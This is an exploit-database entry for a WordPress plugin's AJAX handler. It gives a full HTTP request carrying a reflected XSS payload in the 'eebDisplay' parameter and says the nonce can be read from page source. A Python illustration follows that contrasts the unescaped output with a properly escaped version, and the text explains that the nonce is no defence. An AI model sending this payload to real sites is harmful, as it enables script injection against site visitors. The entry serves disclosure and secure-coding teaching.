## https://sploitus.com/exploit?id=WPEX-ID:625A272F-5C69-4F6A-8EEE-32F70CD4A558
The vulnerable function is nonce-protected; the nonce can be found in the site's HTML source by searching for the JavaScript variable "eeb_ef".

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://127.0.0.1:8080
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:8080/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

action=eeb_get_email_form_output&eebsec=<your nonce here>&eebMethod=escape&eebDisplay=&lt;img src=1 onerror=alert(1)&gt;
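The request above delivers the payload entity-encoded (`&lt;img ...&gt;`), which only becomes live markup if the handler decodes it and then writes the result into the page without escaping. The Python below is an added illustration, not the plugin's code: it models that decode-then-emit pattern next to the corrected pattern (escape at the point of output, after any decoding) and checks both with the exact `eebDisplay` value from the PoC. The parameter name and payload come from the request; the span wrapper, function names and the assumption that the handler decodes entities are constructed for the example.

```python
"""Added illustration of the output-escaping failure behind the PoC above.

Not the plugin's code: render_vulnerable() is a constructed model of the
flawed pattern (decode client-supplied entities, then concatenate into
markup) and render_hardened() is the corrected pattern. The parameter
value is copied from the PoC request; the surrounding markup is assumed.
"""
import html
import re

# eebDisplay value exactly as it appears in the PoC request body.
POC_DISPLAY = "&lt;img src=1 onerror=alert(1)&gt;"

# Matches any element tag; a correct renderer never produces one from input.
TAG_RE = re.compile(r"<[a-zA-Z/][^>]*>")
SPAN_RE = re.compile(r'<span class="eeb-display">(.*)</span>', re.S)


def render_vulnerable(display: str) -> str:
    """Model of the flaw (assumed, not the plugin's code): entities sent by
    the client are decoded and the decoded string is emitted unescaped."""
    text = html.unescape(display)  # "&lt;img ...&gt;" becomes "<img ...>"
    return f'<span class="eeb-display">{text}</span>'


def render_hardened(display: str) -> str:
    """Escape at output time, after any decoding, so whatever the client
    sent can only ever render as text (in WordPress: esc_html()/esc_attr()
    on the value immediately before it is printed)."""
    text = html.unescape(display)
    return f'<span class="eeb-display">{html.escape(text, quote=True)}</span>'


def injected_tags(markup: str) -> list[str]:
    """Return element tags found inside the display span. An empty list
    means the user-controlled value was rendered as text only."""
    inner = SPAN_RE.search(markup).group(1)
    return TAG_RE.findall(inner)


if __name__ == "__main__":
    print("vulnerable:", injected_tags(render_vulnerable(POC_DISPLAY)))
    print("hardened:  ", injected_tags(render_hardened(POC_DISPLAY)))
```

Note that the nonce check the page mentions does not mitigate this: the PoC shows the nonce is readable from the site's HTML by any visitor, so it only proves the request was built from that page, not that the value in `eebDisplay` is safe to render. The fix is contextual output escaping on the rendered value, independent of the nonce.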